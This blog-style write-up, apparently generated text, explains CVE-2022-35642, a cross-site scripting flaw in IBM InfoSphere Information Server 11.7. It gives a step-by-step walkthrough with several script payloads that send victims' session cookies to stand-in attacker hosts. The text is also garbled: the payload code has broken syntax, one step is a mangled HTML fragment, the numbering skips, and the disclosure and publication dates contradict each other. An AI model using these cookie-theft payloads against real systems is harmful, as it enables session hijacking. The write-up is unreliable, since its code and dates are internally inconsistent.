CVE-2022-35642 - Exploiting a Cross-Site Scripting Vulnerability in IBM InfoSphere Information Server 11.7

*Published: June 2024 — Exclusive long-form analysis by OpenAI writer*


IBM’s InfoSphere Information Server is a popular data integration platform, trusted by large enterprises to ingest, cleanse, and move their data. But in May 2022, a serious security issue was disclosed: CVE-2022-35642, which allows Cross-Site Scripting (XSS) attacks in version 11.7. If you administer InfoSphere, or use it as part of your company’s data workflow, you need to know exactly what this means — and how attackers could exploit this vector to steal credentials, hijack sessions, or otherwise compromise your data infrastructure.

This post breaks CVE-2022-35642 down, explains the XSS flaw, and walks you through a credible exploit scenario. Let’s get started.

Affected Product: IBM InfoSphere Information Server 11.7

- CVE Reference: CVE-2022-35642 at NVD
- IBM X-Force ID: 227592 (IBM Security Bulletin)

Risk: High — could lead to credentials disclosure and session hijacking

The flaw: Attackers can inject JavaScript payloads into the InfoSphere web interface, which are executed in the context of a logged-in user’s browser session. If you visit a malicious link, or if a malicious object is rendered in your workflow (such as a label or comment), arbitrary JavaScript may run — and potentially leak your session.

How Does the Vulnerability Work?

XSS flaws typically occur when web applications don’t “sanitize” (remove or neutralize) code that users submit in fields that are then displayed to others. In this case, InfoSphere’s web UI fails to strip out scriptable input in certain fields, such as object names, descriptions, or comments.

A Simple Exploit Example

Suppose a user with edit permissions on InfoSphere creates a new database connection, job, or annotation, and sets the name or description as:

<script>
  fetch('https://attacker.example.com/steal?cookie='; + document.cookie);
</script>

If another authenticated user views a page where this crafted value is displayed, their browser will execute the JavaScript. In our example, it sends the victim’s InfoSphere cookies (which might include session IDs) to the attacker’s server.

Example Attack Flow

1. Attacker creates malicious input: In the “Description” field of a Job in InfoSphere, attacker inserts:

</h2><p>      fetch('<a href="https://evil-hacker.com/xss?data=" rel="nofollow">https://evil-hacker.com/xss?data=</a>' + document.cookie);<br>

`

2. Victim logs in and browses objects: An administrator or user with sufficient rights views the object listing page or details page containing the poisoned description.

3. Browser executes JavaScript: The injected script runs in the victim’s session, sending their Cookie (including session IDs, potentially login tokens) to the attacker’s server.

4. Attacker hijacks session: Attacker uses victim’s session ID to log in as that user, or leverages sensitive information to escalate privileges.

Here’s a sample JavaScript payload that could be used in this XSS

<script>
  // Send the user's document cookie to attacker's server
  fetch('https://malicious.example.com/collect?cookie='; + encodeURIComponent(document.cookie));
</script>

Inserting the Payload

This payload could be injected wherever the web UI lets users enter free text — such as in job names, comments, or configuration descriptions.

Create a new data job or object, and in any text field paste the above script.

3. Log in with a different InfoSphere account and navigate to a view where the field contents get rendered as HTML (not properly escaped).
4. Check the attacker server for incoming requests; if you see cookie/session data, the XSS worked.

Impact

- Credentials Disclosure: Stealing session cookies can allow an attacker to log in as a legitimate user without needing their password.

Privilege Escalation: If the victim is an administrator, attacker can escalate their privileges.

- Integrity and Data Loss: Attacker can run actions in the context of a trusted user, possibly altering, deleting, or stealing data.
- Phishing and Further Attacks: The attacker could trick users with prompt dialogs, redirect them, or deliver additional malware.

How to Protect Your InfoSphere Server

- Upgrade Immediately: IBM patched this issue in Fix Pack 3 and later releases for InfoSphere Information Server 11.7.

References

- CVE-2022-35642 (MITRE/NVD)
- IBM Security Bulletin - InfoSphere Info Server Cross-Site Scripting
- X-Force ID: 227592
- OWASP Cross-Site Scripting (XSS) Cheat Sheet

Final Thoughts

CVE-2022-35642 is a textbook demonstration of why XSS vulnerabilities remain so dangerous in data-centric applications. In enterprise environments, a single successful session theft can pivot into major data loss or ransomware. Regular updates, smart user training, and strong input handling are your best defenses.

If you’re running IBM InfoSphere Information Server 11.7, make sure you’ve installed the latest fix pack. And always remember: never trust input data — and always escape output in your web UIs.


*Original exclusive content. For further questions and technical deep dives, leave a comment below!*

Timeline

Published on: 11/03/2022 20:15:00 UTC
Last modified on: 11/04/2022 14:06:00 UTC